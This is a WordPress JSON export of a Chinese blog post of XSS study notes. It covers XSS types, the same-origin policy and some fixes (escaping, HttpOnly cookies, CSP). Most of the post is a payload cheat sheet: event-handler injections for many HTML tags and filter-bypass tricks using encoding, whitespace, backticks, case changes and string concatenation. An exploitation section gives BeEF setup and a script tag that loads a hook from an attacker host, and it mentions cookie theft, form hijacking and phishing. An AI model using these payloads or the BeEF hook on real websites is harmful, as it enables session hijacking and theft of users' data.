{"id":19,"date":"2023-02-18T12:23:20","date_gmt":"2023-02-18T04:23:20","guid":{"rendered":"http:\/\/123.207.45.199\/?p=19"},"modified":"2026-05-31T21:59:22","modified_gmt":"2026-05-31T13:59:22","slug":"xss%e8%b7%a8%e7%ab%99%e8%84%9a%e6%9c%ac%e6%94%bb%e5%87%bb","status":"publish","type":"post","link":"https:\/\/www.redspear.cn\/index.php\/2023\/02\/18\/xss%e8%b7%a8%e7%ab%99%e8%84%9a%e6%9c%ac%e6%94%bb%e5%87%bb\/","title":{"rendered":"xss\u8de8\u7ad9\u811a\u672c\u653b\u51fb"},"content":{"rendered":"\n

xss\u539f\u7406<\/h2>\n\n\n\n

==>html\u4ee3\u7801=>\u7528\u6237<\/p>\n\n\n\n

\u6307\u653b\u51fb\u8005\u5229\u7528\u7f51\u7ad9\u7a0b\u5e8f\u5bf9\u7528\u6237\u8f93\u5165\u8fc7\u6ee4\u4e0d\u8db3\uff0c\u8f93\u5165\u53ef\u4ee5\u663e\u793a\u5728\u9875\u9762\u4e0a\u5bf9\u5176\u4ed6\u7528\u6237\u9020\u6210\u5f71\u54cd\u7684htll\u4ee3\u7801\uff0c
\u4ece\u800c\u76d7\u53d6\u7528\u6237\u8d44\u6599\u3001\u5229\u7528\u7528\u6237\u8eab\u4efd\u8fdb\u884c\u67d0\u79cd\u52a8\u4f5c\u6216\u8005\u5bf9\u8bbf\u95ee\u8005\u8fdb\u884c\u75c5\u6bd2\u4fb5\u5bb3\u7684\u4e00\u79cd\u653b\u51fb\u65b9\u5f0f\u3002\u901a\u8fc7\u5728\u7528\u6237\u7aef\u6ce8\u5165\u6076\u610f\u7684\u53ef\u6267\u884c\u811a\u672c\uff0c\u82e5\u670d\u52a1\u5668\u5bf9\u7528\u6237\u7684\u8f93\u5165\u4e0d\u8fdb\u884c\u5904\u7406\u6216\u5904\u7406\u4e0d\u4e25\uff0c\u5219\u6d4f\u89c8\u5668\u5c31\u4f1a\u76f4\u6309\u6267\u884c\u7528\u6237\u6ce8\u5165\u7684\u811a\u672c\u3002
-\u6570\u636e\u4ea4\u4e92\u7684\u5730\u65b9
get\u3001post\u3001headers
\u53cd\u9988\u4e0e\u6d4f\u89c8
\u5bcc\u6587\u672c\u7f16\u8f91\u5668  paload=\"onclick=\"xxx\"><script><\/script>
\u5404\u7c7b\u6807\u7b7e\u63d2\u5165\u548c\u81ea\u5b9a\u4e49
-\u6570\u636e\u8f93\u51fa\u7684\u5730\u65b9
\u7528\u6237\u8d44\u6599
\u5173\u952e\u8bcd \u6807\u7b7e \u8bf4\u660e
\u6587\u4ef6\u4e0a\u4f20(xss)
\u63a7\u5236\u53f0\u5f39\u7a97\u8bed\u53e5
a=var input = prompt(\"Please enter your name\", \"Harry Potter\");<\/pre>\n\n\n\n
\u5371\u5bb3<\/h2>\n\n\n\n
1.\u7f51\u7edc\u9493\u9c7c
2.\u7a83\u53d6\u7528\u6237cookies\u8d44\u6599,\u4ece\u800c\u83b7\u53d6\u7528\u6237\u9690\u79c1\u4fe1\u606f
3.\u622a\u53d6\u7528\u6237\u6d4f\u89c8\u5668\u4f1a\u8bdd,\u4ece\u800c\u6267\u884c\u4efb\u610f\u64cd\u4f5c \u975e\u6cd5\u8f6c\u8d26,\u53d1\u8868\u65e5\u5fd7
4.\u5f3a\u5236\u5f39\u51fa\u5e7f\u544a\u9875\u9762,\u5237\u6d41\u91cf
5.\u7f51\u9875\u6302\u9a6c
6.\u8fdb\u884c\u6076\u610f\u64cd\u4f5c    xss+csrf
7.\u8fdb\u884c\u5927\u91cf\u5ba2\u6237\u7aef\u653b\u51fb ddos
...<\/pre>\n\n\n\n
\u7c7b\u578b<\/h2>\n\n\n\n
\u53cd\u5c04\u578b(\u975e\u6301\u4e45\u578b) \u540e\u53f0  \u670d\u52a1\u5668(url)
\u8f93\u5165xss\u811a\u672c\u6216\u8f93\u5165xss\u811a\u672c\u70b9\u51fb\u6309\u94ae\u5373\u53ef\u5b8c\u6210xss\u653b\u51fb
\u4e3b\u8981\u5b58\u5728\u4e8eurl\u5730\u5740\u680f,\u641c\u7d22\u6846
\u200b
\u5b58\u50a8\u578b(\u6301\u4e45\u578b)    \u540e\u53f0  \u670d\u52a1\u5668->\u6570\u636e\u5e93
\u5c06\u7528\u6237\u8f93\u5165\u7684\"\u6570\u636e\"\u5b58\u50a8\u5728\u670d\u52a1\u5668\u7aef
\u4e3b\u8981\u5b58\u5728\u4e8e\u53d1\u5e16 \u56de\u5e16  \u7528\u6237\u6ce8\u518c
\u200b
DOM\u578b    \u524d\u53f0  ->js    \u6d4f\u89c8\u5668
\u4fee\u6539\u9875\u9762\u7684DOM\u8282\u70b9\u6765\u8fdb\u884cxss
\u57fa\u4e8e\u6587\u6863\u5bf9\u8c61\u6a21\u578b
\u200b
UXSS(\u901a\u7528\u578b)   \u63d2\u4ef6  \u7ffb\u8bd1
PDF XSS     =>\u9488\u5bf9pdf
\u5371\u5bb3:\u9493\u9c7c cookie\u76d7\u53d6 \u83b7\u53d6ip\u6bb5 <\/pre>\n\n\n\n
\u540c\u6e90\u7b56\u7565<\/h2>\n\n\n\n
\u9650\u5236\u672c\u5730\u8d44\u6e90\u88ab\u7b2c\u4e09\u65b9\u7f51\u7ad9\u8bfb\u53d6\u7684\u7b56\u7565   
\u90e8\u5206html\u6807\u7b7e\u4e0d\u53d7\u540c\u6e90\u7b56\u7565\u9650\u5236
\u540c\u6e90\u7b56\u7565: \u534f\u8bae\u4e00\u81f4 \u7f51\u7ad9\u57df\u540d\u4e00\u81f4 \u7aef\u53e3\u4e00\u81f4<\/pre>\n\n\n\n
XSS\u5e38\u7528\u6807\u7b7e<\/h2>\n\n\n\n
onclick javascript onerror onload \u4e8b\u4ef6<\/p>\n\n\n\n
\u6807\u7b7ea<\/p>\n\n\n\n
<a href=\"javascript:alert(1)\">test<\/a>
<a href=\"x\" onfocus=\"alert('xss');\" autofocus=\"\">xss<\/a>
<a href=\"x\" onclick=eval(\"alert('xss');\")>xss<\/a>
<a href=\"x\" onmouseover=\"alert('xss');\">xss<\/a>
<a href=\"x\" onmouseout=\"alert('xss');\">xss<\/a><\/pre>\n\n\n\n
\u6807\u7b7eimg<\/p>\n\n\n\n
<img src=x onerror=\"alert(1)\">
<img src=x onerror=eval(\"alert(1)\")>
<img src=1 onmouseover=\"alert('xss');\">
<img src=1 onmouseout=\"alert('xss');\">
<img src=1 onclick=\"alert('xss');\"><\/pre>\n\n\n\n
\u6807\u7b7eiframe<\/p>\n\n\n\n
<iframe src=\"javascript:alert(1)\">test<\/iframe>
<iframe onload=\"alert(document.cookie)\"><\/iframe>
<iframe onload=\"alert('xss');\"><\/iframe>
<iframe onload=\"base64,YWxlcnQoJ3hzcycpOw==\"><\/iframe>
<iframe onmouseover=\"alert('xss');\"><\/iframe>
<iframe src=\"data:text\/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=\"><\/pre>\n\n\n\n
\u6807\u7b7eaudio<\/p>\n\n\n\n
<audio src=1 onerror=alert(1)>
<audio><source src=\"x\" onerror=\"alert('xss');\"><\/audio>
<audio controls onfocus=eval(\"alert('xss');\") autofocus=\"\"><\/audio>
<audio controls onmouseover=\"alert('xss');\"><source src=\"x\"><\/audio><\/pre>\n\n\n\n
\u6807\u7b7evideo<\/p>\n\n\n\n
<video src=x onerror=alert(1)>\n<video><source onerror=\"alert('xss');\"><\/video>\n<video controls onmouseover=\"alert('xss');\"><\/video>\n<video controls onfocus=\"alert('xss');\" autofocus=\"\"><\/video>\n<video controls onclick=\"alert('xss');\"><\/video><\/pre>\n\n\n\n
\u6807\u7b7esvg<\/p>\n\n\n\n
<svg onload=javascript:alert(1)>\n<svg onload=\"alert('xss');\"><\/svg><\/pre>\n\n\n\n
\u6807\u7b7ebutton<\/p>\n\n\n\n
<button onclick=alert(1)>\n<button onfocus=\"alert('xss');\" autofocus=\"\">xss<\/button>\n<button onclick=\"alert('xss');\">xss<\/button>\n<button onmouseover=\"alert('xss');\">xss<\/button>\n<button onmouseout=\"alert('xss');\">xss<\/button>\n<button onmouseup=\"alert('xss');\">xss<\/button>\n<button onmousedown=\"alert('xss');\"><\/button><\/pre>\n\n\n\n
\u6807\u7b7ediv<\/p>\n\n\n\n
\u8fd9\u4e2a\u9700\u8981\u501f\u52a9url\u7f16\u7801\u6765\u5b9e\u73b0\u7ed5\u8fc7<\/p>\n\n\n\n
\u539f\u4ee3\u7801\uff1a\n<div onmouseover='alert(1)'>DIV<\/div>\n\u7ecf\u8fc7url\u7f16\u7801\uff1a\n<div onmouseover%3d'alert%26lpar%3b1%26rpar%3b'>DIV<%2fdiv><\/pre>\n\n\n\n
\u6807\u7b7eobject<\/p>\n\n\n\n
\u8fd9\u4e2a\u9700\u8981\u501f\u52a9 data \u4f2a\u534f\u8bae\u548c base64 \u7f16\u7801\u6765\u5b9e\u73b0\u7ed5\u8fc7<\/p>\n\n\n\n
<object data=\"data:text\/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=\"><\/object><\/pre>\n\n\n\n
\u6807\u7b7escript<\/p>\n\n\n\n
<script>alert('xss')<\/script>\n<script>alert(\/xss\/)<\/script>\n<script>alert(123)<\/script><\/pre>\n\n\n\n
\u6807\u7b7ep<\/p>\n\n\n\n
<p onclick=\"alert('xss');\">xss<\/p>\n<p onmouseover=\"alert('xss');\">xss<\/p>\n<p onmouseout=\"alert('xss');\">xss<\/p>\n<p onmouseup=\"alert('xss');\">xss<\/p><\/pre>\n\n\n\n
\u6807\u7b7einput<\/p>\n\n\n\n
<input onclick=\"alert('xss');\">\n<input onfocus=\"alert('xss');\">\n<input onfocus=\"alert('xss');\" autofocus=\"\">\n<input onmouseover=\"alert('xss');\">\n<input type=\"text\" onkeydown=\"alert('xss');\"><\/input>\n<input type=\"text\" onkeypress=\"alert('xss');\"><\/input>\n<input type=\"text\" onkeydown=\"alert('xss');\"><\/input><\/pre>\n\n\n\n
\u6807\u7b7edetails<\/p>\n\n\n\n
<details ontoggle=\"alert('xss');\"><\/details>\n<details ontoggle=\"alert('xss');\" open=\"\"><\/details><\/pre>\n\n\n\n
\u6807\u7b7eselect<\/p>\n\n\n\n
<select onfocus=\"alert('xss');\" autofocus><\/select>\n<select onmouseover=\"alert('xss');\"><\/select>\n<select onclick=eval(\"alert('xss');\")><\/select><\/pre>\n\n\n\n
\u6807\u7b7efrom<\/p>\n\n\n\n
<form method=\"x\" action=\"x\" onmouseover=\"alert('xss');\"><input type=submit><\/form>\n<form method=\"x\" action=\"x\" onmouseout=\"alert('xss');\"><input type=submit><\/form>\n<form method=\"x\" action=\"x\" onmouseup=\"alert('xss');\"><input type=submit><\/form><\/pre>\n\n\n\n
\u6807\u7b7ebody<\/p>\n\n\n\n
<body onload=\"alert('xss');\"><\/body><\/pre>\n\n\n\n
XSS\u8fc7\u6ee4\u7ed5\u8fc7<\/h2>\n\n\n\n
\u7f16\u7801\/\u6807\u70b9\u7b26\u53f7\/\u5173\u952e\u5b57<\/p>\n\n\n\n
\u8865\u5145:\u9488\u5bf9> <\u7684\u8fc7\u6ee4 \u53ef\u7528 \\u003E \\u003C unicode<\/p>\n\n\n\n
\u7f16\u7801\u7ed5\u8fc7<\/h3>\n\n\n\n
\u6d4f\u89c8\u5668\u5bf9xss\u4ee3\u7801\u7684\u89e3\u6790\u987a\u5e8f\u4e3a:HTML\u89e3\u7801–URL\u89e3\u7801–JS\u89e3\u7801<\/p>\n\n\n\n
javascript\u534f\u8bae data\u534f\u8bae<\/p>\n\n\n\n
html\u5b9e\u4f53\u7f16\u7801\n\nurl\u7f16\u7801\tJavascript\n\u5f53\u6ce8\u5165\u70b9\u5b58\u5728href\u6216\u8005src\u5c5e\u6027\u65f6,\u53ef\u4ee5\u4f7f\u7528url\u7f16\u7801\n\njs\u7f16\u7801(unicode\u7f16\u7801)\n\n\u6df7\u5408\u7f16\u7801\njs\u7f16\u7801->url\u7f16\u7801->html\u5b9e\u4f53\u7f16\u7801\n\nbase64\u7f16\u7801\ndata:text\/html;base64,payload(base64)\natob\u51fd\u6570 \u7528\u4e8e\u89e3\u7801\u4f7f\u7528base-64\u7f16\u7801\u7684\u5b57\u7b26\u4e32\n\nascii\u7f16\u7801\nascii\u7f16\u7801\u4e00\u822c\u914d\u5408'string.fromcharcode'<\/pre>\n\n\n\n
\u7a7a\u683c\u7ed5\u8fc7<\/h3>\n\n\n\n
\u9488\u5bf9\u8bed\u53e5\u7684\u4e0d\u540c\u4f4d\u7f6e\u53ef\u7528\/ \u6216 \u7a7a\u683c \u6362\u884c \u7684\u8f6c\u4e49\u7ed5\u8fc7<\/p>\n\n\n\n
<img(A)src(A)onerror(B)=(B)alert(C)(1)(D)>\n\nA\u4f4d\u7f6e\u53ef\u586b\u5145\/\uff0c\/123\/\uff0c%09\uff0c%0A,%0C,%0D,%20\nB\u4f4d\u7f6e\u53ef\u586b\u5145%09\uff0c%0A,%0C,%0D,%20\nC\u4f4d\u7f6e\u53ef\u586b\u5145%B,\/**\/,\n\u5982\u679c\u52a0\u4e86\u53cc\u5f15\u53f7\uff0c\u5219\u53ef\u4ee5\u586b\u5145%09\uff0c%0A,%0C,%0D,%20\nD\u4f4d\u7f6e\u53ef\u586b\u5145%09\uff0c%0A,%0C,%0D,%20,\u2225\uff0c><\/pre>\n\n\n\n
\u5706\u62ec\u53f7\u8fc7\u6ee4\u7ed5\u8fc7<\/h3>\n\n\n\n
\u53cd\u5f15\u53f7\u66ff\u6362\n<script>alert`1`<\/script>\n\nthrow\u7ed5\u8fc7\n<video src onerror=\"javascript:window.onerror=alert;throw\">\n<\/pre>\n\n\n\n
\u5355\u5f15\u53f7\u7ed5\u8fc7<\/h3>\n\n\n\n
\u659c\u6746\u66ff\u6362\n<script>alert(\/xss\/)<\/script>\n\n\u53cd\u5f15\u53f7\u7ed5\u8fc7\n<script>alert(`xss`)<\/script><\/pre>\n\n\n\n
alert\u8fc7\u6ee4\u7ed5\u8fc7<\/h3>\n\n\n\n
prompt\u66ff\u6362\n<script>prompt('xss')<\/script>\n\nconfirm\u66ff\u6362\n<script>confirm('xss')<\/script>\n\nconsole.log\u66ff\u6362\n<script>console.log(3)<\/script>\n\ndocument.write\u66ff\u6362\t(\u6700\u597d\u4e0d\u8981\u7528)\n<script>document.write(1)<\/script>\n\nbase64\u7ed5\u8fc7\n<script><\/script><\/pre>\n\n\n\n
\u5173\u952e\u8bcd\u7f6e\u6362\u7ed5\u8fc7<\/h3>\n\n\n\n
\u5927\u5c0f\u5199\u7ed5\u8fc7\n<script>aLeRt(\/xss\/)<\/script>\n\n\u53cc\u5199\u7ed5\u8fc7\n<script>alalertert(\/xss\/)<\/script><\/pre>\n\n\n\n
*\u51fd\u6570\u62fc\u63a5<\/h3>\n\n\n\n
\u5229\u7528\u65f6\u52a0\u53f7\u9700\u8981\u8f6c\u4e49 %2B<\/p>\n\n\n\n
eval() top() window[] self()<\/p>\n\n\n\n
eval()\n<img src=1 onerror=\"eval('ale'+'rt(1)')\">\n\ntop[]\n<img src=1 onerror=\"top['ale'+'rt'](1)\">\n\nwindow[]\n<img src=1 onerror=\"window['alert'](1)\">\n\nself()\n<img src=1 onerror=\"\">\n\nparent()\n\nframes()<\/pre>\n\n\n\n
\u5e38\u7528\u51fd\u6570<\/h3>\n\n\n\n
<img src=\"x\"onerror=\"eval(alert(1))\">\n<img src=\"x\"onerror=\"open(alert(1))\">\n<img src=\"x\"onerror=\"document.write(alert(1))\">\n<img src=\"x\"onerror=\"setTimeout(alert(1))\">\n<img src=\"x\"onerror=\"setInterval(alert(1))\">\n<img src=\"x\"onerror=\"Set.constructor (alert(1))\">\n<img src=\"x\"onerror=\"Map.constructor(alert(1))\">\n<img src=\"x\"onerror=\"Array.constructor (alert(1))\">\n<img src=\"x\"onerror=\"Weakset.constructor(alert(1))\">\n<img src=\"x\"onerror=\"constructor.constructor (alert(1))\">\n<img src=\"x\"onerror=\"[1].map(alert(1))\">\n<img src=\"x\"onerror=\"[1].find(alert(1))\">\n<img src=\"x\"onerror=\"[1].every(alert(1))\">\n<img src=\"x\"onerror=\"[1].filter (alert(1))\">\n<img src=\"x\"onerror=\"[1].forEach(alert(1))\">\n<img src=\"x\"onerror=\"[1].findIndex(alert(1))\"><\/pre>\n\n\n\n
\u8d4b\u503c\u62fc\u63a5<\/h3>\n\n\n\n
<img src onerror=_=alert,_(1)>\n<img src x=al y=ert onerror=top [x+y](1)>\n<img src onerror=top [a='al',b='ev',b+a]('alert(1)')>\n<img src onerror=['ale'+'rt']map(top ['ev'+'al'])[0]['valu'+'eof']()(1)><\/pre>\n\n\n\n
xss\u4fee\u590d<\/h2>\n\n\n\n
1.\u8fc7\u6ee4\u5371\u9669\u5b57\u7b26\n\u8f6c\u4e49& <> \" ' \\ \u7b49\u5371\u9669\u5b57\u7b26\n\u81ea\u5b9a\u4e49\u8fc7\u6ee4\u51fd\u6570\u5f15\u7528\nhtmlspecialchars \u7f16\u7801\u8f6c\u4e49\n(\u53d8\u91cf,\u7c7b\u578b)\t\t\t\n\u7c7b\u578b\tENT_COMPAT \u9ed8\u8ba4 \u7f16\u7801\u53cc\u5f15\u53f7\n\t ENT_QUOTES  \u7f16\u7801\u5355\u5f15\u53f7 \u53cc\u5f15\u53f7\n\t ENT_NOQUOTES \u4e0d\u7f16\u7801\u4efb\u4f55\u5f15\u53f7\n\u9884\u5b9a\u4e49\u7684\u5b57\u7b26\u662f\uff1a\n    & \uff08\u548c\u53f7\uff09\u6210\u4e3a &\n    \" \uff08\u53cc\u5f15\u53f7\uff09\u6210\u4e3a \"\n    ' \uff08\u5355\u5f15\u53f7\uff09\u6210\u4e3a '\n    < \uff08\u5c0f\u4e8e\uff09\u6210\u4e3a <\n    > \uff08\u5927\u4e8e\uff09\u6210\u4e3a >\n\n2.http-only Cookie =>\u9632\u6b62cookie\u76d7\u7528=>\u901a\u8fc7\u8bfb\u53d6\u7684\u6570\u636e\u83b7\u53d6\u8d26\u53f7\u5bc6\u7801,\n\u9700\u8981 xss \u4ea7\u751f\u767b\u5f55\u5730\u5740\uff08\u6f0f\u6d1e\u4ea7\u751f\u5728\u767b\u5f55\u754c\u9762\uff09\uff0c\u5229\u7528\u8868\u5355\u52ab\u6301\n\n3.\u8bbe\u7f6eCSP(\u7f51\u9875\u5b89\u5168\u7b56\u7565)\t=>\u767d\u540d\u5355\u7b56\u7565\n\n4.\u8f93\u5165\u5185\u5bb9\u957f\u5ea6\u9650\u5236\n<\/pre>\n\n\n\n
xss\u5b9e\u6218\u5229\u7528<\/h2>\n\n\n\n
xss\u5229\u7528\u5e73\u53f0<\/h3>\n\n\n\n
xss\u5e73\u53f0\nhttps:\/\/xss.pt\n\nbeef-XSS\ndocker run --rm -p 3000:3000 janes\/beef\nhttp:\/\/<ip>:3000\/ui\/authentication\n\u8d26\u6237\/\u5bc6\u7801\uff1abeef\/beef\npayload:\n<script src='http:\/\/<ip>:3000\/hook.js'><\/script><\/pre>\n\n\n\n
\u540e\u53f0\u690d\u5165cookie&\u8868\u5355\u52ab\u6301<\/h3>\n\n\n\n
–\u6743\u9650\u7ef4\u6301<\/p>\n\n\n\n
\u6761\u4ef6:xss\u63a7\u5236\u5bf9\u65b9\u7f51\u7ad9\u6e90\u7801<\/pre>\n\n\n\n
Flash\u9493\u9c7c\u914d\u5408\u6728\u9a6c\u6346\u7ed1\u4e0a\u7ebf<\/h3>\n\n\n\n
–\u914d\u5408xss\u9493\u9c7c<\/p>\n\n\n\n
\u5982\u4f55\u6d4b\u8bd5<\/h2>\n\n\n\n
1.\u6d4b\u8bd5\u662f\u5426\u5b58\u5728xss<\/p>\n\n\n\n
‘ “><img\/src=x> \u5b58\u50a8\/dom<\/p>\n\n\n\n
‘”><sssss \u53cd\u5c04<\/p>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
xss\u539f\u7406 ==>html\u4ee3\u7801=>\u7528\u6237 \u6307\u653b\u51fb\u8005\u5229\u7528\u7f51\u7ad9\u7a0b\u5e8f\u5bf9\u7528\u6237\u8f93\u5165\u8fc7\u6ee4\u4e0d\u8db3\uff0c\u8f93\u5165\u53ef\u4ee5\u663e\u793a\u5728\u9875\u9762 … <\/p>\n","protected":false},"author":3,"featured_media":25,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-19","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-webtob10"],"_links":{"self":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/19","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/comments?post=19"}],"version-history":[{"count":1,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/19\/revisions"}],"predecessor-version":[{"id":20,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/19\/revisions\/20"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/media\/25"}],"wp:attachment":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/media?parent=19"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/categories?post=19"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/tags?post=19"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}